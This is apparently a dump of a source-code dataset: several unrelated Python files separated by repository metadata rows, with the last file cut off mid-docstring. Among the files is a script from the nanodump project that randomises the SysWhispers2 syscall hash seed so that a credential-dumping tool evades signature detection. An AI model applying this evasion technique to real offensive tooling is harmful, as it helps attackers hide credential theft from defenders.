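# Paragraphs are composed of runs (spans of text sharing the same formatting), which
# is why paragraphs[1] above exposes runs[0]..runs[3]. A minimal sketch that walks
# every run, assuming the same demo.docx used above:
for i, para in enumerate(doc.paragraphs):
    for j, run in enumerate(para.runs):
        print('paragraph %d run %d: %s' % (i, j, run.text))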
| 44.083333 | 64 | 0.680529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 185 | 0.349716 |
6a114f290b289195e2b18bfe3c8fd05836efd438 | 1,821 | py | Python | src/GL/sim/gql_ql_sims_ml_analysis.py | kylmcgr/RL-RNN-SURF | 5d6db3e6ff4534003f2a7e832f221b5e529775d5 | [
"Apache-2.0"
] | 2 | 2021-03-12T11:12:23.000Z | 2021-05-19T08:32:47.000Z | src/GL/sim/gql_ql_sims_ml_analysis.py | kylmcgr/RL-RNN-SURF | 5d6db3e6ff4534003f2a7e832f221b5e529775d5 | [
"Apache-2.0"
] | 6 | 2019-12-16T21:54:13.000Z | 2022-02-10T00:16:08.000Z | src/GL/sim/gql_ql_sims_ml_analysis.py | kylmcgr/RL-RNN-SURF | 5d6db3e6ff4534003f2a7e832f221b5e529775d5 | [
"Apache-2.0"
] | 3 | 2019-11-07T22:44:21.000Z | 2021-02-22T05:51:59.000Z | # Analysis the data generated from on policy simulations of QL, QLP and GQL.
from BD.sim.sims import sims_analysis, merge_sim_files, extract_run_rew
from BD.util.paths import Paths
def sims_analysis_BD():
input_folder = Paths.rest_path + 'archive/beh/qlp-ml-opt/qlp-ml/'
sims_analysis(input_folder,
Paths.local_path + 'BD/to_graph_data/qlp_ml_onpolicy__stats.csv',
lambda conf: True
)
input_folder = Paths.rest_path + 'archive/beh/ql-ml-opt/ql-ml/'
sims_analysis(input_folder,
Paths.local_path + 'BD/to_graph_data/ql_ml_onpolicy_stats.csv',
lambda conf: True
)
def sims_analysis_GQL_BD():
input_folder = Paths.rest_path + 'archive/beh/gql-ml-opt/gql-ml/'
sims_analysis(input_folder,
Paths.local_path + 'BD/to_graph_data/gql_ml_onpolicy_stats.csv',
lambda conf: True
)
input_folder = Paths.rest_path + 'archive/beh/gql10d-ml-opt/gql10d-ml/'
sims_analysis(input_folder,
Paths.local_path + 'BD/to_graph_data/gql10d_ml_onpolicy_stats.csv',
lambda conf: True
)
if __name__ == '__main__':
sims_analysis_BD()
sims_analysis_GQL_BD()
data = merge_sim_files(lambda x: True, Paths.rest_path + 'archive/beh/gql10d-ml-opt/gql10d-ml/')
all_trials = extract_run_rew(data)
output_file = Paths.local_path + 'BD/to_graph_data/gql10d_all_data_ml.csv'
all_trials.to_csv(output_file, header=True)
data = merge_sim_files(lambda x: True, Paths.rest_path + 'archive/beh/gql-ml-opt/gql-ml/')
all_trials = extract_run_rew(data)
output_file = Paths.local_path + 'BD/to_graph_data/gql_all_data_ml.csv'
all_trials.to_csv(output_file, header=True)
| 35.019231 | 100 | 0.665568 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 546 | 0.299835 |
6a11d7dca909e3885ae2dbc3bc1e2d0a99547ada | 3,901 | py | Python | scripts/randomize_sw2_seed.py | epichoxha/nanodump | 3a269ed427b474a701197e13ce40cb1daf803a82 | [
"Apache-2.0"
] | null | null | null | scripts/randomize_sw2_seed.py | epichoxha/nanodump | 3a269ed427b474a701197e13ce40cb1daf803a82 | [
"Apache-2.0"
] | null | null | null | scripts/randomize_sw2_seed.py | epichoxha/nanodump | 3a269ed427b474a701197e13ce40cb1daf803a82 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import glob
import random
import struct
def get_old_seed():
with open('include/syscalls.h') as f:
code = f.read()
match = re.search(r'#define SW2_SEED (0x[a-fA-F0-9]{8})', code)
assert match is not None, 'SW2_SEED not found!'
return match.group(1)
def replace_seed(old_seed, new_seed):
with open('include/syscalls.h') as f:
code = f.read()
code = code.replace(
f'#define SW2_SEED {old_seed}',
f'#define SW2_SEED 0x{new_seed:08X}',
1
)
with open('include/syscalls.h', 'w') as f:
f.write(code)
def get_function_hash(seed, function_name, is_syscall=True):
function_hash = seed
function_name = function_name.replace('_', '')
if is_syscall and function_name[:2] == 'Nt':
function_name = 'Zw' + function_name[2:]
name = function_name + '\0'
ror8 = lambda v: ((v >> 8) & (2 ** 32 - 1)) | ((v << 24) & (2 ** 32 - 1))
for segment in [s for s in [name[i:i + 2] for i in range(len(name))] if len(s) == 2]:
partial_name_short = struct.unpack('<H', segment.encode())[0]
function_hash ^= partial_name_short + ror8(function_hash)
return function_hash
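# The hashing above mirrors the SysWhispers2 seed scheme: starting from the seed, each
# overlapping two-byte window of the NUL-terminated (Zw-prefixed) name is folded in by
# XOR-ing the 16-bit chunk plus a 32-bit rotate-right-by-8 of the running hash, so a
# new random SW2_SEED changes every syscall hash at once.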
def replace_syscall_hashes(seed):
with open('source/syscalls.c') as f:
code = f.read()
regex = re.compile(r'__declspec\(naked\) NTSTATUS (Nt[^(]+)')
syscall_names = re.findall(regex, code)
syscall_names = set(syscall_names)
syscall_definitions = code.split('#elif defined(__GNUC__)')[3]
for syscall_name in syscall_names:
regex = re.compile('NTSTATUS ' + syscall_name + '\\(.*?"mov ecx, (0x[A-Fa-f0-9]{8})', re.DOTALL)
match = re.search(regex, syscall_definitions)
assert match is not None, f'hash of syscall {syscall_name} not found!'
old_hash = match.group(1)
new_hash = get_function_hash(seed, syscall_name)
print(f'{syscall_name} -> {old_hash} - 0x{new_hash:08X}')
code = code.replace(
old_hash,
f'0x{new_hash:08X}'
)
with open('source/syscalls.c', 'w') as f:
f.write(code)
with open('source/syscalls-asm.asm') as f:
code = f.read()
for syscall_name in syscall_names:
regex = re.compile(syscall_name + ' PROC.*?mov ecx, 0([A-Fa-f0-9]{8})h', re.DOTALL)
match = re.search(regex, code)
assert match is not None, f'hash of syscall {syscall_name} not found!'
old_hash = match.group(1)
new_hash = get_function_hash(seed, syscall_name)
code = code.replace(
f'0{old_hash}h',
f'0{new_hash:08X}h',
1
)
with open('source/syscalls-asm.asm', 'w') as f:
f.write(code)
def replace_dinvoke_hashes(seed):
for header_file in glob.glob("include/**/*.h", recursive=True):
with open(header_file) as f:
code = f.read()
regex = re.compile(r'#define (\w+)_SW2_HASH (0x[a-fA-F0-9]{8})')
matches = re.findall(regex, code)
for function_name, old_hash in matches:
new_hash = get_function_hash(seed, function_name, is_syscall=False)
code = code.replace(
f'#define {function_name}_SW2_HASH {old_hash}',
f'#define {function_name}_SW2_HASH 0x{new_hash:08X}',
1
)
if matches:
with open(header_file, 'w') as f:
f.write(code)
def main():
new_seed = random.randint(2 ** 28, 2 ** 32 - 1)
#new_seed = 0x1337c0de
old_seed = get_old_seed()
replace_seed(old_seed, new_seed)
replace_syscall_hashes(new_seed)
replace_dinvoke_hashes(new_seed)
if os.name == 'nt':
print('done! recompile with:\nnmake -f Makefile.msvc')
else:
print('done! recompile with:\nmake -f Makefile.mingw')
if __name__ == '__main__':
main()
| 32.508333 | 104 | 0.600103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 980 | 0.251218 |
6a11fa8d863a9e5b451bd2a7ef2241aafe768509 | 1,289 | py | Python | checker/checker/executer.py | grimpy/hexa-a | 556e9a2a70758bf9c7d70f91776d361b40524c78 | [
"Apache-2.0"
] | 3 | 2018-02-05T11:43:04.000Z | 2019-02-22T18:11:55.000Z | checker/checker/executer.py | grimpy/hexa-a | 556e9a2a70758bf9c7d70f91776d361b40524c78 | [
"Apache-2.0"
] | 4 | 2019-03-26T09:51:43.000Z | 2019-03-31T06:41:14.000Z | checker/checker/executer.py | grimpy/hexa-a | 556e9a2a70758bf9c7d70f91776d361b40524c78 | [
"Apache-2.0"
] | 1 | 2019-03-03T20:55:21.000Z | 2019-03-03T20:55:21.000Z | from subprocess import run, PIPE, TimeoutExpired, CompletedProcess
from codes import exitcodes
def _error_decode(response):
stderr = ""
if response.returncode:
if response.returncode < 0:
errmsg = exitcodes.get(abs(response.returncode), "Unknown Error")
if isinstance(errmsg, dict):
errmsg = errmsg["descr"]
else:
errmsg = response.stderr
stderr = "Exit code ({}): {}".format(abs(response.returncode), errmsg)
return response.returncode, stderr
def execute(cmd, workdir=None, timeout=60):
cmd = ["/bin/bash", "-c", cmd]
try:
response = run(
cmd,
stderr=PIPE,
stdout=PIPE,
cwd=workdir,
timeout=timeout,
universal_newlines=True,
)
except TimeoutExpired:
response = CompletedProcess(
args=cmd,
returncode=124,
stderr="Timeout"
)
except:
response = CompletedProcess(
args=cmd,
returncode=-1,
stderr="Internal Checker Error"
)
response.stdout = "" if not response.stdout else str(response.stdout)
response.returncode, response.stderr = _error_decode(response)
return response | 30.690476 | 78 | 0.577967 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 94 | 0.072925 |
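# Usage sketch (hypothetical command): execute("echo hi", timeout=5) returns a
# CompletedProcess with stdout "hi\n", returncode 0 and stderr ""; a command that
# exceeds `timeout` instead comes back with returncode 124 and stderr
# "Exit code (124): Timeout" after passing through _error_decode above.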
6a124e6043f5f93ce124eed73efc4b8488512375 | 1,739 | py | Python | pfm/pf_command/update.py | takahi-i/pfm | 224ca961ca43f50bd877789e2d8659ae838d517f | [
"MIT"
] | 9 | 2018-01-06T05:44:43.000Z | 2020-06-24T00:15:16.000Z | pfm/pf_command/update.py | takahi-i/pfm | 224ca961ca43f50bd877789e2d8659ae838d517f | [
"MIT"
] | 27 | 2018-01-06T09:29:48.000Z | 2020-04-10T16:11:59.000Z | pfm/pf_command/update.py | takahi-i/pfm | 224ca961ca43f50bd877789e2d8659ae838d517f | [
"MIT"
] | 1 | 2018-01-09T01:33:42.000Z | 2018-01-09T01:33:42.000Z | import json
from pfm.pf_command.base import BaseCommand
from pfm.util.log import logger
class UpdateCommand(BaseCommand):
def __init__(self, name, forward_type,
remote_host, remote_port, local_port,
ssh_server, server_port, login_user, config):
super(UpdateCommand, self).__init__(config)
self.name = name
self.forward_type = forward_type
self.remote_host = remote_host
self.remote_port = remote_port
self.local_port = local_port
self.ssh_server = ssh_server
self.server_port = server_port
self.login_user = login_user
def run(self):
f = open(self.config_path, 'r')
targets = json.load(f)
if self.name in targets:
target = targets[self.name]
self.update(target)
else:
logger.warn("Port forward setting named " + self.name + "is not registered")
        # write the updated targets back to the config file
f = open(self.config_path, 'w')
f.write(json.dumps(targets, indent=4))
f.close()
def update(self, target):
if self.forward_type is not None:
target["type"] = self.forward_type
if self.remote_host is not None:
target["remote_host"] = self.remote_host
if self.remote_port is not None:
target["remote_port"] = self.remote_port
if self.local_port is not None:
target["local_port"] = self.local_port
if self.ssh_server is not None:
target["ssh_server"] = self.ssh_server
if self.server_port is not None:
target["server_port"] = self.server_port
if self.login_user is not None:
target["login_user"] = self.login_user
| 34.78 | 88 | 0.617021 | 1,647 | 0.947096 | 0 | 0 | 0 | 0 | 0 | 0 | 153 | 0.087982 |
6a12692597c07586454530c9bcf5baae61076b3f | 7,499 | py | Python | tests/atfork/test_atfork.py | luciferliu/xTools | 324ef1388be13ece0d952e3929eb685212d573f1 | [
"Apache-2.0"
] | null | null | null | tests/atfork/test_atfork.py | luciferliu/xTools | 324ef1388be13ece0d952e3929eb685212d573f1 | [
"Apache-2.0"
] | null | null | null | tests/atfork/test_atfork.py | luciferliu/xTools | 324ef1388be13ece0d952e3929eb685212d573f1 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
#
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Licensed to the PSF under a Contributor Agreement.
#
# Author: Gregory P. Smith <[email protected]>
"""Tests for atfork."""
import os
import sys
import importlib
from xTool.compat import StringIO
import traceback
import unittest
from xTool import atfork
class AtforkTest(unittest.TestCase):
def setUp(self):
atfork.monkeypatch_os_fork_functions()
self.calls = []
self.orig_stderr = sys.stderr
self.assertFalse(
atfork._fork_lock.locked(),
"atfork._fork_lock not released by an earlier test!",
)
# Unregister calls registered by earlier tests.
atfork._prepare_call_list = []
atfork._parent_call_list = []
atfork._child_call_list = []
def tearDown(self):
# Un-monkeypatch the os module. ook.
global os
importlib.reload(os)
sys.stderr = self.orig_stderr
def _pre(self):
self.calls.append(self._pre)
def _parent(self):
self.calls.append(self._parent)
def _child(self):
self.calls.append(self._child)
def _other(self):
self.calls.append(self._other)
def _raise_pre(self):
self._pre()
raise RuntimeError("This as the first parent error expected.")
def _raise_parent(self):
self._parent()
raise RuntimeError("This as the second parent error expected.")
def _raise_child(self):
self._child()
raise RuntimeError("This child error is expected.")
def _assert_expected_parent_stderr(self, error_msg):
self.assertTrue(("first parent error" in error_msg), error_msg)
self.assertTrue(("second parent error" in error_msg), error_msg)
self.assertTrue(
(error_msg.index("first parent") < error_msg.index("second parent")),
"first and second errors out of order in:\n%r" % error_msg,
)
self.assertEqual(2, error_msg.count("RuntimeError:"))
def _assert_expected_child_stderr(self, error_msg):
self.assertTrue("child error is expected" in error_msg)
self.assertEqual(1, error_msg.count("RuntimeError:"), error_msg)
def test_monkeypatching(self):
if not hasattr(os, "fork"):
return # Nothing to test on this platform.
self.assertTrue(callable(atfork._orig_os_fork))
self.assertTrue(callable(atfork._orig_os_forkpty))
# The os module was patched, these should not be equal.
self.assertNotEqual(atfork._orig_os_fork, os.fork)
self.assertNotEqual(atfork._orig_os_forkpty, os.forkpty)
# These are the wrapped versions we patched in.
self.assertEqual(atfork.os_fork_wrapper, os.fork)
self.assertEqual(atfork.os_forkpty_wrapper, os.forkpty)
def test_register_atfork_calls(self):
# Test with both positional and keyword arguments as well as None.
atfork.atfork(self._pre, self._parent, self._child)
atfork.atfork(prepare=self._pre)
atfork.atfork(parent=self._parent)
atfork.atfork(child=self._child)
self.assertEqual([self._pre] * 2, atfork._prepare_call_list)
self.assertEqual([self._parent] * 2, atfork._parent_call_list)
self.assertEqual([self._child] * 2, atfork._child_call_list)
if __debug__:
self.assertRaises(AssertionError, atfork.atfork, 1, 2, 3)
def test_call_atfork_list(self):
self.assertEqual([], atfork._call_atfork_list([]))
self.assertEqual([], atfork._call_atfork_list([self._pre]))
def raise_something():
raise RuntimeError()
errors = atfork._call_atfork_list([raise_something] * 2)
self.assertEqual(2, len(errors))
for exc_info in errors:
self.assertEqual(RuntimeError, exc_info[0])
def _test_a_fork_wrapper(self, fork_func):
sys.stderr = StringIO() # restored in tearDown
atfork.atfork(self._raise_pre, self._raise_parent, self._raise_child)
atfork.atfork(self._other, self._other, self._other)
pid = fork_func()
if pid == 0:
try:
try:
self.assertEqual(
[self._pre, self._other, self._child, self._other], self.calls
)
self.assertFalse(atfork._fork_lock.locked())
self._assert_expected_child_stderr(sys.stderr.getvalue())
except BaseException:
try:
traceback.print_exc()
self.orig_stderr.write(sys.stderr.getvalue())
finally:
os._exit(1)
finally:
os._exit(0)
else:
self.assertEqual(
[self._pre, self._other, self._parent, self._other], self.calls
)
self.assertFalse(atfork._fork_lock.locked())
self.assertEqual(0, os.waitpid(pid, 0)[1], "error in child")
self._assert_expected_parent_stderr(sys.stderr.getvalue())
def test_os_fork_wrapper(self):
self._test_a_fork_wrapper(os.fork)
def test_os_forkpty_wrapper(self):
self._test_a_fork_wrapper(lambda: os.forkpty()[0])
def _test_fork_failure(self, orig_fork_attrname, fork_wrapper):
def failing_fork():
raise OSError(0, "testing a fork failure")
atfork.atfork(self._pre, self._parent, self._child)
orig_orig_fork = getattr(atfork, orig_fork_attrname)
try:
setattr(atfork, orig_fork_attrname, failing_fork)
try:
pid = fork_wrapper()
if pid == 0:
# This should never happen but do this just in case.
os._exit(0)
except OSError:
self.assertEqual([self._pre, self._parent], self.calls)
else:
self.fail("Fork failed to fail!")
finally:
setattr(atfork, orig_fork_attrname, orig_orig_fork)
def test_fork_wrapper_failure(self):
self._test_fork_failure("_orig_os_fork", atfork.os_fork_wrapper)
def test_forkpty_wrapper_failure(self):
self._test_fork_failure("_orig_os_forkpty", atfork.os_forkpty_wrapper)
def test_multiple_monkeypatch_safe(self):
self.assertNotEqual(atfork._orig_os_fork, atfork.os_fork_wrapper)
self.assertNotEqual(atfork._orig_os_forkpty, atfork.os_forkpty_wrapper)
atfork.monkeypatch_os_fork_functions()
self.assertNotEqual(atfork._orig_os_fork, atfork.os_fork_wrapper)
self.assertNotEqual(atfork._orig_os_forkpty, atfork.os_forkpty_wrapper)
atfork.monkeypatch_os_fork_functions()
self.assertNotEqual(atfork._orig_os_fork, atfork.os_fork_wrapper)
self.assertNotEqual(atfork._orig_os_forkpty, atfork.os_forkpty_wrapper)
if __name__ == "__main__":
unittest.main()
| 37.123762 | 86 | 0.648887 | 6,575 | 0.876784 | 0 | 0 | 0 | 0 | 0 | 0 | 1,530 | 0.204027 |
6a131e98cf16cdcab3785e1e0af7a922aba56c50 | 2,213 | py | Python | IO/files/handling.py | brendano257/Zugspitze-Schneefernerhaus | 64bb86ece2eec147f2a7fb412f87ff2313388753 | [
"MIT"
] | null | null | null | IO/files/handling.py | brendano257/Zugspitze-Schneefernerhaus | 64bb86ece2eec147f2a7fb412f87ff2313388753 | [
"MIT"
] | null | null | null | IO/files/handling.py | brendano257/Zugspitze-Schneefernerhaus | 64bb86ece2eec147f2a7fb412f87ff2313388753 | [
"MIT"
] | null | null | null | import os
from pathlib import Path
__all__ = ['list_files_recur', 'scan_and_create_dir_tree', 'get_all_data_files', 'get_subsubdirs']
def list_files_recur(path):
"""
Cheater function that wraps path.rglob().
:param Path path: path to list recursively
:return list: list of Path objects
"""
files = []
for file in path.rglob('*'):
files.append(file)
return files
def scan_and_create_dir_tree(path, file=True):
"""
Creates all the necessary directories for the file at the end of path to be created.
When specified with a filepath to a file or folder, it creates directories until the path is valid.
:param Path path: must end with a filename, else the final directory won't be created
:param bool file: Boolean, does the given path end with a file? If not, path.parts[-1] will be created
:return None:
"""
parts = path.parts
path_to_check = Path(parts[0])
for i in range(1, len(parts)):
if not path_to_check.exists():
path_to_check.mkdir()
path_to_check = path_to_check / parts[i]
if file:
pass
else:
if not path_to_check.exists():
path_to_check.mkdir()
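# Design note: the loop above creates each missing directory one level at a time so
# that a trailing filename can be skipped; much the same effect could likely be had
# with pathlib's built-in Path(path).parent.mkdir(parents=True, exist_ok=True)
# (or path.mkdir(parents=True, exist_ok=True) when file=False).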
def get_all_data_files(path, filetype):
"""
Recursively search the given directory for .xxx files.
:param Path path: Path to search
:param str filetype: str, ".type" of file to search for
:return list: list of file-like Path objects
"""
files = list_files_recur(path)
files[:] = [file for file in files if filetype in file.name]
return files
def get_subsubdirs(path):
"""
Get the second-level subdirectories of the given path.
If given path 'a/b', a sample return would be ['a/b/c/d', 'a/b/c/d2', 'a/b/c/etc']
:param str path:
:return list: list containing Path instances for all paths found two levels below the supplied path
"""
leveltwo_subdirs = []
immediate_subdirs = [os.scandir(subdir) for subdir in os.scandir(path) if Path(subdir).is_dir()]
for scan in immediate_subdirs:
for subdir in scan:
leveltwo_subdirs.append(Path(subdir)) if Path(subdir).is_dir() else None
return leveltwo_subdirs
| 28.371795 | 106 | 0.66742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,149 | 0.519205 |
6a139742e2452134cace4ac02e78a8badeceb098 | 2,617 | py | Python | tools/mo/openvino/tools/mo/ops/detection_output_onnx.py | ryanloney/openvino-1 | 4e0a740eb3ee31062ba0df88fcf438564f67edb7 | [
"Apache-2.0"
] | 1,127 | 2018-10-15T14:36:58.000Z | 2020-04-20T09:29:44.000Z | tools/mo/openvino/tools/mo/ops/detection_output_onnx.py | ryanloney/openvino-1 | 4e0a740eb3ee31062ba0df88fcf438564f67edb7 | [
"Apache-2.0"
] | 439 | 2018-10-20T04:40:35.000Z | 2020-04-19T05:56:25.000Z | tools/mo/openvino/tools/mo/ops/detection_output_onnx.py | ryanloney/openvino-1 | 4e0a740eb3ee31062ba0df88fcf438564f67edb7 | [
"Apache-2.0"
] | 414 | 2018-10-17T05:53:46.000Z | 2020-04-16T17:29:53.000Z | # Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import numpy as np
from openvino.tools.mo.front.common.partial_infer.utils import dynamic_dimension_value, shape_array, set_input_shapes
from openvino.tools.mo.ops.op import Op
class ExperimentalDetectronDetectionOutput(Op):
op = 'ExperimentalDetectronDetectionOutput'
enabled = True
def __init__(self, graph, attrs):
mandatory_props = dict(
type=self.op,
op=self.op,
version='opset6',
infer=self.infer,
reverse_infer=self.reverse_infer,
type_infer=self.type_infer,
in_ports_count=4,
out_ports_count=3,
)
super().__init__(graph, mandatory_props, attrs)
def backend_attrs(self):
return [
('class_agnostic_box_regression', lambda node: str(bool(node['class_agnostic_box_regression'])).lower()),
'max_detections_per_image',
'nms_threshold',
'num_classes',
'post_nms_count',
'score_threshold',
'max_delta_log_wh',
('deltas_weights', lambda node: ','.join(map(str, node['deltas_weights'])))]
@staticmethod
def infer(node):
rois_num = node.max_detections_per_image
# boxes
node.out_port(0).data.set_shape([rois_num, 4])
# classes, scores, batch indices
# We use range(1, 1 + max(node.out_ports().keys())) instead of range(1, 3), because there are incorrectly
# generated models where ExperimentalDetectronDetectionOutput has 4 outputs.
for port_ind in range(1, 1 + max(node.out_ports().keys())):
if not node.out_port(port_ind).disconnected():
node.out_port(port_ind).data.set_shape([rois_num])
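        # For example, with max_detections_per_image=100 this yields boxes of shape
        # [100, 4] on port 0 and 1-D tensors of length 100 for classes/scores (and,
        # for the malformed 4-output models noted above, batch indices as well).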
@staticmethod
def type_infer(node):
in_data_type = node.in_port(0).get_data_type()
node.out_port(0).set_data_type(in_data_type)
node.out_port(1).set_data_type(np.int32) # the second output contains class indices
node.out_port(2).set_data_type(in_data_type)
if node.is_out_port_connected(3):
node.out_port(3).set_data_type(np.int32) # the fourth output contains batch indices
@staticmethod
def reverse_infer(node):
set_input_shapes(node,
shape_array([dynamic_dimension_value, 4]),
shape_array([dynamic_dimension_value, node['num_classes'] * 4]),
shape_array([dynamic_dimension_value, node['num_classes']]),
shape_array([1, 3]))
| 39.059701 | 117 | 0.635078 | 2,353 | 0.899121 | 0 | 0 | 1,383 | 0.528468 | 0 | 0 | 658 | 0.251433 |
6a139aa59f68903a8a744250e0c92696c28eb301 | 2,046 | py | Python | driver.py | FahimMahmudJoy/Physionet_2019_Sepsis | d31bec40aa0359071bfaff1a4d72569c5731a04e | [
"BSD-2-Clause"
] | 1 | 2019-06-26T19:38:33.000Z | 2019-06-26T19:38:33.000Z | driver.py | FahimMahmudJoy/Physionet_2019_Sepsis | d31bec40aa0359071bfaff1a4d72569c5731a04e | [
"BSD-2-Clause"
] | null | null | null | driver.py | FahimMahmudJoy/Physionet_2019_Sepsis | d31bec40aa0359071bfaff1a4d72569c5731a04e | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
import numpy as np, os, sys
from get_sepsis_score import load_sepsis_model, get_sepsis_score
def load_challenge_data(file):
with open(file, 'r') as f:
header = f.readline().strip()
column_names = header.split('|')
data = np.loadtxt(f, delimiter='|')
# Ignore SepsisLabel column if present.
if column_names[-1] == 'SepsisLabel':
column_names = column_names[:-1]
data = data[:, :-1]
return data
def save_challenge_predictions(file, scores, labels):
with open(file, 'w') as f:
f.write('PredictedProbability|PredictedLabel\n')
for (s, l) in zip(scores, labels):
f.write('%g|%d\n' % (s, l))
if __name__ == '__main__':
# Parse arguments.
if len(sys.argv) != 3:
raise Exception('Include the input and output directories as arguments, e.g., python driver.py input output.')
input_directory = sys.argv[1]
output_directory = sys.argv[2]
# Find files.
files = []
for f in os.listdir(input_directory):
if os.path.isfile(os.path.join(input_directory, f)) and not f.lower().startswith('.') and f.lower().endswith('psv'):
files.append(f)
if not os.path.isdir(output_directory):
os.mkdir(output_directory)
# Load model.
model = load_sepsis_model()
print(model)
# Iterate over files.
for f in files:
# Load data.
input_file = os.path.join(input_directory, f)
data = load_challenge_data(input_file)
# print(type(data))
# Make predictions.
num_rows = len(data)
scores = np.zeros(num_rows)
labels = np.zeros(num_rows)
for t in range(num_rows):
current_data = data[:t+1]
current_score, current_label = get_sepsis_score(current_data, model)
scores[t] = current_score
labels[t] = current_label
# Save results.
output_file = os.path.join(output_directory, f)
save_challenge_predictions(output_file, scores, labels)
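        # Predictions are cumulative: at each time step t the model only sees
        # data[:t+1], i.e. the rows observed so far, mimicking real-time scoring.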
| 30.537313 | 124 | 0.623167 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 381 | 0.186217 |
6a139fa7954e69a2e28f61ebd4a2c8e7028fb83e | 2,589 | py | Python | src/LspRuntimeMonitor.py | TafsirGna/ClspGeneticAlgorithm | 25184afbbd52773b8aed2e268ae98dd9656cacda | [
"MIT"
] | null | null | null | src/LspRuntimeMonitor.py | TafsirGna/ClspGeneticAlgorithm | 25184afbbd52773b8aed2e268ae98dd9656cacda | [
"MIT"
] | null | null | null | src/LspRuntimeMonitor.py | TafsirGna/ClspGeneticAlgorithm | 25184afbbd52773b8aed2e268ae98dd9656cacda | [
"MIT"
] | null | null | null | #!/usr/bin/python3.5
# -*-coding: utf-8 -*
from collections import defaultdict
from threading import Thread
from time import perf_counter, time
from LspLibrary import bcolors
import time
import matplotlib.pyplot as plt
class LspRuntimeMonitor:
"""
"""
clockStart = None
clockEnd = None
mutation_strategy = "simple_mutation"
popsData = defaultdict(lambda: None)
outputString = ""
outputFilePath = "data/output/output.txt"
verbose = False
running = True
def __init__(self) -> None:
"""
"""
pass
@classmethod
def duration(cls):
"""
"""
return f"{cls.clockEnd - cls.clockStart} second(s)"
@classmethod
def started(cls):
"""
"""
cls.running = True
LspRuntimeMonitor.clockStart = perf_counter()
print(f"{bcolors.OKGREEN}Processing input data.{bcolors.ENDC}")
# Thread(cls.waitingAnimation())
@classmethod
def ended(cls):
"""
"""
cls.running = False
LspRuntimeMonitor.clockEnd = perf_counter()
@classmethod
def output(cls, output):
"""
"""
cls.outputString += output
if cls.verbose:
print(output)
@classmethod
def saveOutput(cls):
"""
"""
f = open(cls.outputFilePath, "w")
f.write(cls.outputString)
f.close()
@classmethod
def report(cls):
"""
"""
# Duration
durationStatement = cls.duration()
cls.output(durationStatement)
# Saving all generated output to a default file
cls.saveOutput()
cls.plotData()
@classmethod
def plotData(cls):
"""
"""
print('-----------------------------------------')
print(cls.popsData)
data = list(cls.popsData.values())[0]
# Plots
# Plotting the evolution of the minimal cost over generations
plt.plot(list(range(len(data["max"]))), data["max"])
plt.ylabel("Population maximal cost")
plt.show()
# Plotting the evolution of the minimal cost over generations
plt.plot(list(range(len(data["min"]))), data["min"])
plt.ylabel("Population minimal cost")
plt.show()
@classmethod
def waitingAnimation(cls):
"""
"""
animation = "|/-\\"
idx = 0
# while thing_not_complete():
while cls.running:
print(animation[idx % len(animation)], end="\r")
idx += 1
time.sleep(0.1) | 21.940678 | 71 | 0.545384 | 2,367 | 0.914253 | 0 | 0 | 1,969 | 0.760525 | 0 | 0 | 704 | 0.27192 |
6a1517953444573e16ddd717619e49c3ca5152a5 | 70 | py | Python | core/github/parsers/__init__.py | goranc/GraphYourCodeVulnerability | 72c04ed5d63602f295d9ac31e97c97935ca78e1b | [
"Apache-2.0"
] | null | null | null | core/github/parsers/__init__.py | goranc/GraphYourCodeVulnerability | 72c04ed5d63602f295d9ac31e97c97935ca78e1b | [
"Apache-2.0"
] | 2 | 2021-12-22T11:59:47.000Z | 2022-01-19T19:28:36.000Z | core/github/parsers/__init__.py | goranc/GraphYourCodeVulnerability | 72c04ed5d63602f295d9ac31e97c97935ca78e1b | [
"Apache-2.0"
] | 5 | 2021-12-22T11:09:23.000Z | 2021-12-26T10:18:49.000Z | from .python.parser import PythonParser
all_parsers = [PythonParser]
| 17.5 | 39 | 0.814286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
6a152a32efa9784006230b4163868ce2479ff3ba | 20,737 | py | Python | methylcheck/predict/sex.py | FoxoTech/methylcheck | 881d14d78e6086aab184716e0b79cdf87e9be8bf | [
"MIT"
] | null | null | null | methylcheck/predict/sex.py | FoxoTech/methylcheck | 881d14d78e6086aab184716e0b79cdf87e9be8bf | [
"MIT"
] | 11 | 2021-04-08T16:14:54.000Z | 2022-03-09T00:22:13.000Z | methylcheck/predict/sex.py | FoxoTech/methylcheck | 881d14d78e6086aab184716e0b79cdf87e9be8bf | [
"MIT"
] | 1 | 2022-02-10T09:06:45.000Z | 2022-02-10T09:06:45.000Z | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from pathlib import Path
#app
import methylcheck # uses .load; get_sex uses methylprep models too and detect_array()
import logging
LOGGER = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def _get_copy_number(meth,unmeth):
"""function to return copy number.
requires dataframes of methylated and
unmethylated values. can be raw OR corrected"""
# minfi R version:
# log2(getMeth(object) + getUnmeth(object))
return np.log2(meth+unmeth)
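# e.g. a probe with meth=3000 and unmeth=5000 gives log2(8000) ~= 12.97; get_sex()
# below compares per-sample medians of these values for X probes vs Y probes.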
def get_sex(data_source, array_type=None, verbose=False, plot=False, save=False,
on_lambda=False, median_cutoff= -2, include_probe_failure_percent=True,
poobah_cutoff=20, custom_label=None, return_fig=False, return_labels=False):
"""This will calculate and predict the sex of each sample.
inputs:
=======
the "data_source" can be any one of:
path -- to a folder with csv data that contains processed sample data
path -- to a folder with the 'meth_values.pkl' and 'unmeth_values.pkl' dataframes
